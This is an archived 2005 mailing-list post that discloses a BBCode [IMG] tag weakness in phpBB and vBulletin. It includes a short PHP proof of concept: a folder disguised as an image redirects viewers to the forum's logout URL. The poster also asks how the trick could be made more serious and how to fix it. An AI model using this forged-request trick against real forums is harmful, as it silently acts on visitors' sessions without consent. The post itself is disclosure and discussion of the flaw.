lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <68cbfab105082115552e80f66b@mail.gmail.com>
Date: Sun Aug 21 23:55:32 2005
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: BBCode [IMG] [/IMG ] Tag Vulnerability

Hi,

Saw this one on www.waraxe.us (Discovered by Easyex) and i was
thinking if there are some more possibilities using the method
described. The POC below is for phpBB. -

==========
make yourself a folder on your host 
rename the folder to signature.jpg 
this will trick bbcode that its an image file. 

example http://sitewithmaliciouscode/signature.jpg 

inside that folder .. put this code .. 
and rename it to index.php file. 

Quote: 
<?php 
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true"); 
exit; 
?>

this will make every visitor getting logout when they view the thread that 
have image linked to this.
===================


This seems to be working on almost all the scripts using BBcode.
Successfully tested on vBulletin 3.0.7 and phpBB 2.0.17 when used the
image link to the folder with the malicious code as the forum
signature. What i was wondering is there anything more serious than
logging out the users that can be done with this? The admin folders of
ipb and phpbb need reauthentication. So nothing serious for them but
anything more innovative that could be done? And any way to fix this?

Regards,
-- 
http://www.h4cky0u.org
(In)Security at its best...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ